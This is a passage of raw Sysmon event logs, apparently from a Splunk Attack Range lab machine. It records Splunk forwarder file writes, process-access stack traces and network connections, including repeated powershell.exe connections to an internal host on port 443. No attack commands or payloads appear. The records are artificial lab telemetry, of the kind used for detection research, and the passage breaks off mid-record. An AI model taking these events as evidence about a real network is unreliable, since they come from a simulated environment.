Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5576DCC2F9387034B0FA3D4E10540AB9,SHA256=A2C2BF0BD550E756BAC8DDC4F46AFD51D99110C03D34D749FAC802F6614FA5AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:02.567{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F2F8B7B99942BAA4BD95D2749A4615A,SHA256=6ACF428C7D3C96ED586FEC38F1E0B5355D51BABFD092047E8C3475F6D8FB0BA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:32.747{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50385-false10.0.1.12-8000- 23542300x800000000000000036496237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:03.600{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BE4B69FC3870C4091528ACE5F2F27DB,SHA256=76DF475FF95558681348FDDCB9D9F4F26C4B3D19EB23F4C3F5124117779A7A9B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:04.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B85FE77D66D8C47996CEA94A5FDBEAE6,SHA256=AD11D67E459C4E3BCB0C95FCE852A82533FBC235ABC392432CC21B920F165633,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:05.634{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE2BFF9B82C198E6DFEFC96B4022598,SHA256=910E4B205AC2C7C1C8D6149A6A77E9AFF3700133EBF64A76C48E70394259DDAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:05.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=161F7887C726E4084C384D20CBFA0B9E,SHA256=CC64FD2AF0A4D536DD7D26DBD3A20EF8927BD06B2B052E31B9EFDFE3E1F269D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:06.649{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E81DC764909CA42F984359E9729B973,SHA256=6994AD242F554DE8DDE9AF890272772527BAFE2D8695AB8D24FD972266790F24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:35.677{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50386-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:07.663{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAAFE31279F4C778E1C5B884F978B2C,SHA256=BAA565D3157AB880F1590479CD32F0E368677005819A8F7F93874ABFF7DE18A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.799{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F6C-6140-5356-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.797{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.797{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.796{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.796{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.796{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F6C-6140-5356-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.796{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F6C-6140-5356-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.778{B81B27B7-9F6C-6140-5356-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.699{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE152817635A6ADB928EAAD15953DEA7,SHA256=F7B8A3187E46C947F24D2908A1F4F171B1F6E0BF39C96A1D091AC4117A7D79B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.774{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50387-false10.0.1.12-8000- 10341000x800000000000000036496252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.262{B81B27B7-9F6C-6140-5256-04000000C801}67242936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F6C-6140-5256-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9F6C-6140-5256-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F6C-6140-5256-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.079{B81B27B7-9F6C-6140-5256-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.714{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=820E700ADB3D1E8DB022CFD2613B9D75,SHA256=C451ED4DAD28495E681B92C98C78673A81573D551028126BBF2E94E225828A49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=51CFDA1C270C0E2BA6BCEFE4F40DDF35,SHA256=BA76D9FEEA779550F8A4D71D0EB73E7F83BF7F31B91AD4F0355EC595939A4614,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.097{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A02034E5C3DA78A8B1145384E72CD0C,SHA256=A262965FDB8467AE96129E6E59C1555BBF5FA1CDC27423647E3C6A3590AD2C06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.096{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=428A7F449D6185AEF177EF1A1E6EE122,SHA256=D0C978869196F30257E26F50F563BA444D6E5BDDEF2E1337C3E19BDF11F18534,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:39.695{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50388-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:10.718{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78940FB11E52B53EBD93210C09224A8,SHA256=76892065DBB8604F437B5B84119F97B305DA822105363D115E0AEF39A43EE8BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:11.732{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB4F34F90E4D7ACA36C2E00532D4AE2A,SHA256=91AD3EC458116AFEDA67442401C025162309230705CDDB005A146EEF97E1A48D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:12.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C84180C941D417FE15337DB8705F955,SHA256=89249807128E86D1D554447D399DD71B84941716AC0B6D08AB56304E0432A2E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:13.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA8AB601CCAA9D86A32AE48F761D53DA,SHA256=F005C70C1BE05092BEE8E4CD7EFBA045A765D6F5DEECED1AA90EB2A66BCD92EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:44.756{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 